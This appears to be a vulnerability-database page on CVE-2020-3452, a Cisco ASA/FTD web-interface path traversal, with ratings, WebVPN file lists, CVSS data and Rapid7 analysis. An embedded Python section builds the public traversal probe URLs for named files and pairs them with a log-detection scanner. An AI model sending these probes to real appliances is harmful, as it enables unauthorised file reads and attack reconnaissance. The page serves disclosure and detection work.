Attacker Value
Low
(3 users assessed)
Exploitability
Very High
(3 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network

CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability

Disclosure Date: July 22, 2020
Exploited in the Wild
Execution
Validation
Validated

Description

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.


7
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

Nothing valuable was exposed by the vulnerability; it was also not possible to expand the scope or weaponize it.
This module was also tested with no success: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md
PoC: https://twitter.com/aboul3la/status/1286012324722155525
https://www.youtube.com/watch?v=74ExOh6BVxk

File Entry Points:

logo.gif
http_auth.html
user_dialog.html
localization_inc.lua
portal_inc.lua
include
nostcaccess.html
ask.html
no_svc.html
svc.html
session.js
useralert.html
ping.html
help
app_index.html
tlbr
portal_forms.js
logon_forms.js
win.js
portal.css
portal.js
sess_update.html
blank.html
noportal.html
portal_ce.html
portal.html
home
logon_custom.css
portal_custom.css
preview.html
session_expired
custom
portal_elements.html
commonspawn.js
common.js
appstart.js
appstatus
relaymonjar.html
relaymonocx.html
relayjar.html
relayocx.html
portal_img
color_picker.js
color_picker.html
cedhelp.html
cedmain.html
cedlogon.html
cedportal.html
cedsave.html
cedf.html
ced.html
lced.html
files
pluginlib.js
shshim
do_url
clear_cache
connection_failed_form
apcf
ucte_forbidden_data
ucte_forbidden_url
cookie
session_password.html
tunnel_linux.jnlp
tunnel_mac.jnlp
sdesktop
gp-gip.html
auth.html
wrong_url.html
logon_redirect.html
logout.html
logon.html
test_chargen

5
Ratings
Technical Analysis

This just dropped from https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

Noted by https://twitter.com/ptswarm/status/1285974719821500423

Looks like there is a PoC already, HT to @ccondon-r7 for spotting: https://twitter.com/aboul3la/status/1286012324722155525

Limited scope in the advisory seems to indicate nothing hugely important would be revealed by this vuln, but it is probably very dependent on the configuration and nature of any company’s particular deployment. And there tends to be a notion that once a path traversal vuln is found, folks often find new ways to expand their scope.

1
Ratings
Technical Analysis

SANS ISC has said they’re seeing “small numbers of exploit attempts.” The exploit they’ve detected is identifying vulnerable systems “by reading benign LUA source code files.”

https://isc.sans.edu/diary/26426
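The description above says the bug is a traversal through the WebVPN web services interface that returns files from the entry-point list, and the SANS note says in-the-wild checks identify vulnerable boxes by reading benign Lua source. The following is an added example, not code from this page, the PoC author, or the Metasploit module: it builds the probe paths a scanner would send and flags the same requests in web server or proxy logs. Assumptions: the two request shapes are the publicly reported PoC paths (the `translation-table` and `oem-customization` endpoints under `/+CSCOT+/`), which you should confirm against the PoC tweet and Metasploit module linked above before relying on them; the log lines and the Lua body are constructed samples in Combined Log Format, not real ASA output.

```python
import re
from urllib.parse import unquote

# ASSUMPTION: publicly reported probe shapes for CVE-2020-3452; confirm against the
# linked PoC / Metasploit module. {name} is a file from the page's entry-point list.
TRANSLATION_TABLE = ("/+CSCOT+/translation-table?type=mst"
                     "&textdomain=/%2bCSCOE%2b/{name}&default-language&lang=../")
OEM_CUSTOMIZATION = ("/+CSCOT+/oem-customization?app=AnyConnect&type=oem"
                     "&platform=..&resource-type=..&name=%2bCSCOE%2b/{name}")

# A few of the WebVPN files listed on the page; benign Lua files make good checks.
WEBVPN_FILES = ["portal_inc.lua", "localization_inc.lua", "logon.html", "session.js"]


def build_probe_paths(name="portal_inc.lua"):
    """Return the two probe paths for one WebVPN file (path only, no host)."""
    return [TRANSLATION_TABLE.format(name=name), OEM_CUSTOMIZATION.format(name=name)]


# Combined Log Format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# ".." standing alone as a path segment or parameter value (lang=../ , platform=..&).
TRAVERSAL_RE = re.compile(r'(^|[=/\\&])\.\.($|[/\\&])')


def normalize(target):
    # Decode twice: the PoC double-encodes '+' as %2b so it survives one decode.
    return unquote(unquote(target)).lower()


def is_traversal_attempt(target):
    """True for requests to the /+CSCOT+/ handlers that carry a traversal or ask for a .lua file."""
    t = normalize(target)
    if not t.startswith("/+cscot+/"):
        return False
    return bool(TRAVERSAL_RE.search(t)) or ".lua" in t


def scan_log(text):
    """Return (ip, target, status, served) for each matching request line.
    'served' is only a heuristic: a 200 on a probe suggests the file came back."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m["target"]):
            hits.append((m["ip"], m["target"], int(m["status"]), m["status"] == "200"))
    return hits


LUA_HINTS = ("local ", "function ", "require", "--")


def looks_like_lua_source(body):
    """Heuristic confirmation on the response side: two or more Lua tokens in the body."""
    return sum(h in body for h in LUA_HINTS) >= 2


# Constructed sample log: two probes from one host, two ordinary WebVPN requests from another.
SAMPLE_LOG = """\
198.51.100.7 - - [23/Jul/2020:10:15:02 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 8134 "-" "python-requests/2.24.0"
198.51.100.7 - - [23/Jul/2020:10:15:03 +0000] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 200 8134 "-" "curl/7.68.0"
203.0.113.9 - - [23/Jul/2020:10:16:44 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
203.0.113.9 - - [23/Jul/2020:10:17:01 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&default-language&lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Constructed stand-in for a returned Lua file (not ASA code).
SAMPLE_LUA_BODY = "-- constructed sample\nlocal function portal_init()\n  return true\nend\n"

if __name__ == "__main__":
    for name in WEBVPN_FILES:
        for p in build_probe_paths(name):
            print("probe:", p)
    for ip, target, status, served in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} served={served} {target}")
    print("lua-looking body:", looks_like_lua_source(SAMPLE_LUA_BODY))
```

The decode-twice step matters: a rule that only looks for a literal `../` misses the `%2e%2e%2f` and double-encoded forms, while the normalized `/+cscot+/` prefix keeps ordinary WebVPN traffic (`/+CSCOE+/logon.html`, a legitimate `translation-table` request with `lang=en`) out of the alert. Treat a 200 as a lead, not proof; confirm exposure with `looks_like_lua_source` on the returned body.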

CVSS V3 Severity and Metrics
Base Score:
7.5 High
Impact Score:
3.6
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • cisco

Products

  • adaptive security appliance software,
  • firepower threat defense

Exploited in the Wild

Reported by:
Technical Analysis

On July 22, 2020, Cisco published details on an unauthenticated path traversal vulnerability in the web services interface of their Adaptive Security Appliance (ASA) and Firepower Threat Defense products. Successful exploitation means a remote, unauthenticated attacker can read sensitive files on a target system. CVE-2020-3452 carries a CVSSv3 base score of 7.5. See Cisco’s advisory for full details.

A public proof-of-concept (PoC) for CVE-2020-3452 was released on July 22 by Ahmed Aboul-Ela, the researcher who discovered the vulnerability. There are community reports of opportunistic scanning for the vulnerability, though we do not yet have confirmation of successful widespread exploitation. Rapid7’s Project Sonar has detected more than 85,000 instances of Cisco ASA on the public internet; exposure data in this case is meant to offer a better understanding of known installations and does not imply vulnerability. See Rapid7’s blog for further exposure details.

Affected products include:

  • Cisco products running a vulnerable release of Cisco ASA Software or Cisco FTD Software with a vulnerable AnyConnect or WebVPN configuration. See the Vulnerable Products section of Cisco’s advisory for a table of vulnerable features and configurations: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86#vp
  • Cisco ASA Software releases 9.5 and earlier, as well as Release 9.7, along with Cisco FTD Release 6.2.2 have reached the end of software maintenance and organizations will have to upgrade to a later, supported version to fix this vulnerability.

Rapid7 analysis: CVE-2020-3452 is limited in scope and impact in that it merely allows an attacker to view files on the web services file system. The vulnerability neither gives an attacker code execution on a vulnerable target system nor offers access to ASA, FTD, or underlying operating system files. That said, the vulnerability is trivial to exploit and may yield information that aids in planning multi-step attacks. Enumerating users, for instance, is often a precursor to a brute force or password spraying attack. If an attacker is able to exploit a vulnerability like this one to build a user list, that attacker can then verify which users have VPN access and target those users specifically.

This latest vulnerability in Cisco’s ASA/Firepower products may also presage another wave of vulnerability research and exploit development attention aimed at CVE-2020-3187.

Guidance: Cisco has provided fixes for all supported versions of ASA and FTD components. Cisco ASA and Firepower customers should patch their installations as soon as is practical.